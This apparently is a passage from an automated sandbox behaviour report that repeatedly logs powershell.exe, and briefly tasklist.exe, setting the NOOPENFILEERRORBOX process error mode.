              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
